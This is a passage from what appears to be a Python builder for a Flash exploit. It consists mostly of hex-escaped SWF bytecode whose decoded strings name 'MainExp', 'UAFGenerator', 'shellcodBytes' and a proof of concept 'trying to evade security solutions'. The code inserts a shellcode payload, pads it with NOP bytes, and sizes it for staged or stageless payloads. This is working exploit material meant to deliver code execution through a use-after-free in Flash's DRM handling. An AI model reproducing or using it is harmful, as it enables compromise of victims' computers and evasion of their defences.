\"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\"\r\n\r\nif stageless is True:\r\n paddingreq = 208000 - len(payload)\r\nelse:\r\n paddingreq = 2940 - len(payload)\r\n\r\ndata = data + payload # \u6dfb\u52a0shellcode\r\n\r\nwhile paddingreq > 0:\r\n data = data + \"\\x90\"\r\n paddingreq = paddingreq - 1\r\n\r\nif stageless is True:\r\n data = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x31\\x2E\\x61\\x73\\x05\\x64\\x61\\x74\\x61\\x32\\x05\\x64\\x61\\x74\\x61\\x33\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x45\\x6E\\x64\\x69\\x61\\x6E\\x0D\\x4C\\x49\\x54\\x54\\x4C\\x45\\x5F\\x45\\x4E\\x44\\x49\\x41\\x4E\\x06\\x65\\x6E\\x64\\x69\\x61\\x6E\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x07\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x01\\x2C\\x01\\x20\\x07\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x05\\x73\\x70\\x6C\\x69\\x74\\x05\\x41\\x72\\x72\\x61\\x79\\x0C\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2E\\x61\\x73\\x24\\x30\\x14\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x53\\x70\\x72\\x69\\x74\\x65\\x24\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1F\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x3A\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x00\\x06\\x4E\\x75\\x6D\\x62\\x65\\x72\\x07\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x05\\x76\\x61\\x72\\x5F\\x33\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0A\\x69\\x73\\x44\\x65\\x62\\x75\\x67\\x67\\x65\\x72\\x05\\x76\\x61\\x72\\x5F\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x05\\x76\\x61\\x72\\x5F\\x35\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x76\\x6F\\x69\\x64\\x05\\x43\\x6C\\x61\\x73\\x73\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x33\\x36\\x34\\x03\\x34\\x36\\x33\\x03\\x34\\x39\\x38\\x03\\x35\\x33\\x37\\x03\\x31\\x39\\x39\\x03\\x32\\x32\\x39\\x03\\x69\\x6E\\x74\\x03\\x32\\x36\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x31\\x32\\x37\\x30\\x0D\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x06\\x53\\x70\\x72\\x69\\x74\\x65\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x0F\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x0D\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x11\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x16\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x35\\x37\\x38\\x03\\x31\\x35\\x37\\x05\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x09\\x77\\x72\\x69\\x74\\x65\\x42\\x79\\x74\\x65\\x08\\x74\\x6F\\x53\\x74\\x72\\x69\\x6E\\x67\\x00\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x03\\x69\\x6E\\x74\\x04\\x06\\x07\\x06\\x07\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x0D\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x08\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0C\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3A\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x10\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3E\\x05\\x01\\x16\\x03\\x16\\x0D\\x16\\x12\\x08\\x17\\x05\\x1A\\x17\\x03\\x18\\x01\\x1A\\x01\\x1A\\x1B\\x1A\\x1C\\x1A\\x1D\\x1A\\x1E\\x1A\\x1F\\x16\\x38\\x16\\x3C\\x17\\x4D\\x16\\x49\\x16\\x44\\x16\\x49\\x16\\x49\\x16\\x49\\x08\\x46\\x17\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x05\\x51\\x18\\x51\\x1A\\x51\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x06\\x0C\\x01\\x02\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x01\\x02\\x03\\x11\\x12\\x13\\x0C\\x01\\x12\\x17\\x06\\x18\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x0C\\x12\\x17\\x18\\x0A\\x0B\\x0C\\x0D\\x0E\\x35\\x36\\x37\\x06\\x48\\x07\\x02\\x02\\x07\\x02\\x04\\x07\\x02\\x05\\x07\\x02\\x06\\x07\\x02\\x07\\x07\\x03\\x0C\\x07\\x03\\x0E\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x02\\x08\\x07\\x04\\x11\\x07\\x02\\x13\\x07\\x05\\x16\\x07\\x05\\x18\\x07\\x02\\x19\\x1B\\x01\\x07\\x02\\x21\\x07\\x02\\x22\\x07\\x01\\x23\\x07\\x02\\x25\\x07\\x01\\x26\\x07\\x02\\x27\\x07\\x01\\x28\\x07\\x02\\x2A\\x07\\x02\\x2B\\x07\\x02\\x34\\x07\\x02\\x36\\x07\\x02\\x01\\x07\\x0F\\x39\\x09\\x01\\x02\\x07\\x02\\x3A\\x07\\x10\\x3B\\x07\\x0F\\x3D\\x07\\x0F\\x3E\\x07\\x0F\\x3F\\x1B\\x03\\x07\\x12\\x43\\x07\\x13\\x45\\x07\\x12\\x47\\x07\\x12\\x48\\x07\\x12\\x4A\\x07\\x12\\x4B\\x07\\x12\\x4C\\x07\\x12\\x4F\\x07\\x12\\x4E\\x07\\x12\\x36\\x07\\x12\\x2A\\x07\\x12\\x07\\x07\\x12\\x02\\x07\\x12\\x27\\x07\\x13\\x0E\\x07\\x12\\x0F\\x07\\x12\\x10\\x07\\x12\\x08\\x07\\x12\\x05\\x07\\x12\\x13\\x07\\x17\\x16\\x07\\x17\\x18\\x1B\\x04\\x07\\x12\\x21\\x07\\x12\\x22\\x07\\x12\\x04\\x07\\x12\\x50\\x07\\x12\\x01\\x07\\x12\\x52\\x07\\x12\\x2B\\x07\\x35\\x23\\x07\\x35\\x28\\x07\\x35\\x26\\x09\\x10\\x05\\x09\\x0F\\x05\\x05\\x00\\x00\\x49\\x00\\x00\\x00\\x49\\x00\\x00\\x18\\x53\\x00\\x00\\x00\\x54\\x00\\x00\\x00\\x49\\x00\\x0A\\x2C\\x01\\x2D\\x2E\\x2C\\x01\\x2D\\x2F\\x2C\\x01\\x2D\\x30\\x2C\\x01\\x2D\\x31\\x2C\\x01\\x2D\\x32\\x2C\\x01\\x2D\\x33\\x2C\\x01\\x2D\\x35\\x2C\\x01\\x2D\\x37\\x40\\x01\\x2D\\x41\\x2C\\x01\\x2D\\x42\\x01\\x40\\x1D\\x09\\x36\\x00\\x03\\x02\\x43\\x00\\x00\\x41\\x00\\x2E\\x01\\x00\\x02\\x04\\x02\\x31\\x00\\x01\\x19\\x00\\x30\\x00\\x02\\x06\\x00\\x02\\x01\\x01\\x40\\x04\\x01\\x00\\x00\\x00\\x05\\x00\\x01\\x01\\x01\\x02\\x03\\xD0\\x30\\x47\\x00\\x00\\x01\\x02\\x01\\x01\\x08\\x23\\xD0\\x30\\x65\\x00\\x60\\x29\\x30\\x60\\x20\\x30\\x60\\x21\\x30\\x60\\x22\\x30\\x60\\x23\\x30\\x60\\x1D\\x30\\x60\\x1D\\x58\\x00\\x1D\\x1D\\x1D\\x1D\\x1D\\x1D\\x68\\x40\\x47\\x00\\x00\\x02\\x01\\x01\\x0A\\x0B\\x03\\xD0\\x30\\x47\\x00\\x00\\x03\\x03\\x01\\x0A\\x0B\\x23\\xD0\\x30\\xD0\\x49\\x00\\x5D\\x30\\x5D\\x31\\x4A\\x31\\x00\\x60\\x06\\x87\\x61\\x30\\x60\\x30\\x60\\x07\\x66\\x47\\x61\\x46\\xD0\\x5D\\x41\\xD0\\x4A\\x41\\x01\\x61\\x43\\x47\\x00\\x00\\x04\\x02\\x01\\x09\\x0A\\x09\\xD0\\x30\\x5E\\x31\\x60\\x3F\\x61\\x31\\x47\\x00\\x00\\xBF\\x14\\xD7\\x09\\x00\\x00\\x01\\x00\\x00\\x00\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x00\\x10\\x00\\x2E\\x00\\x03\\xFF\\xFF\\xFF\\xFF\\x0F\\xFF\\xFF\\xFF\\xFF\\x0F\\x00\\x02\\x00\\x00\\xE0\\xFF\\xFF\\xFF\\xEF\\x41\\x79\\x01\\x01\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x2E\\x61\\x73\\x08\\x66\\x6C\\x61\\x73\\x68\\x30\\x24\\x30\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x05\\x76\\x61\\x72\\x5F\\x31\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x0F\\x4C\\x6F\\x63\\x61\\x6C\\x43\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x69\\x6F\\x6E\\x09\\x66\\x6C\\x61\\x73\\x68\\x2E\\x6E\\x65\\x74\\x00\\x07\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x05\\x45\\x72\\x72\\x6F\\x72\\x01\\x65\\x06\\x76\\x61\\x72\\x5F\\x31\\x33\\x07\\x44\\x52\\x4D\\x5F\\x6F\\x62\\x6A\\x05\\x54\\x69\\x6D\\x65\\x72\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x76\\x61\\x72\\x5F\\x31\\x34\\x00\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x31\\x10\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\\x05\\x73\\x74\\x61\\x72\\x74\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0D\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x30\\x01\\x19\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x19\\x63\\x6F\\x6D\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x74\\x76\\x73\\x64\\x6B\\x2E\\x6D\\x65\\x64\\x69\\x61\\x63\\x6F\\x72\\x65\\x04\\x50\\x53\\x44\\x4B\\x13\\x50\\x53\\x44\\x4B\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x04\\x70\\x53\\x44\\x4B\\x10\\x63\\x72\\x65\\x61\\x74\\x65\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x11\\x63\\x72\\x65\\x61\\x74\\x65\\x4D\\x65\\x64\\x69\\x61\\x50\\x6C\\x61\\x79\\x65\\x72\\x06\\x76\\x61\\x72\\x5F\\x31\\x35\\x06\\x76\\x61\\x72\\x5F\\x31\\x36\\x0A\\x64\\x72\\x6D\\x4D\\x61\\x6E\\x61\\x67\\x65\\x72\\x0A\\x69\\x6E\\x69\\x74\\x69\\x61\\x6C\\x69\\x7A\\x65\\x0E\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x32\\x04\\x76\\x6F\\x69\\x64\\x02\\x61\\x31\\x04\\x73\\x74\\x6F\\x70\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x0A\\x69\\x73\\x44\\x65\\x62\\x75\\x67\\x67\\x65\\x72\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x35\\x0E\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x33\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x0A\\x54\\x69\\x6D\\x65\\x72\\x45\\x76\\x65\\x6E\\x74\\x02\\x64\\x64\\x02\\x1E\\x0B\\x03\\x6B\\x65\\x79\\x07\\x4D\\x65\\x6D\\x5F\\x41\\x72\\x72\\x06\\x76\\x61\\x72\\x5F\\x31\\x37\\x06\\x6C\\x65\\x6E\\x67\\x74\\x68\\x03\\x61\\x31\\x35\\x03\\x61\\x33\\x33\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x36\\x03\\x61\\x31\\x31\\x06\\x76\\x61\\x72\\x5F\\x31\\x38\\x03\\x61\\x33\\x32\\x03\\x61\\x32\\x33\\x03\\x61\\x32\\x37\\x03\\x61\\x32\\x34\\x03\\x61\\x32\\x35\\x03\\x61\\x32\\x38\\x03\\x61\\x32\\x39\\x03\\x61\\x32\\x36\\x03\\x61\\x33\\x30\\x06\\x45\\x6E\\x64\\x69\\x61\\x6E\\x0D\\x4C\\x49\\x54\\x54\\x4C\\x45\\x5F\\x45\\x4E\\x44\\x49\\x41\\x4E\\x06\\x65\\x6E\\x64\\x69\\x61\\x6E\\x06\\x50\\x72\\x69\\x6D\\x69\\x74\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x0E\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x34\\x03\\x61\\x31\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x03\\x61\\x33\\x31\\x03\\x61\\x32\\x32\\x0E\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x35\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x34\\x38\\x33\\x0B\\x4D\\x65\\x64\\x69\\x61\\x50\\x6C\\x61\\x79\\x65\\x72\\x03\\x35\\x30\\x34\\x03\\x35\\x33\\x30\\x03\\x35\\x35\\x31\\x03\\x35\\x37\\x32\\x04\\x75\\x69\\x6E\\x74\\x03\\x35\\x39\\x36\\x03\\x36\\x31\\x36\\x04\\x31\\x30\\x36\\x32\\x04\\x31\\x34\\x31\\x38\\x04\\x32\\x34\\x31\\x39\\x04\\x33\\x34\\x31\\x37\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x36\\x35\\x35\\x03\\x34\\x36\\x35\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x03\\x67\\x6F\\x6F\\x05\\x74\\x69\\x6D\\x65\\x72\\x07\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x07\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x0C\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x0D\\x3A\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x15\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x3A\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x0C\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x2E\\x61\\x73\\x24\\x30\\x06\\x5F\\x6C\\x6F\\x63\\x31\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x32\\x5F\\x15\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x3A\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x31\\x14\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x3A\\x66\\x6C\\x61\\x73\\x68\\x32\\x34\\x14\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x3A\\x66\\x6C\\x61\\x73\\x68\\x32\\x35\\x1A\\x3A\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x2F\\x55\\x41\\x46\\x4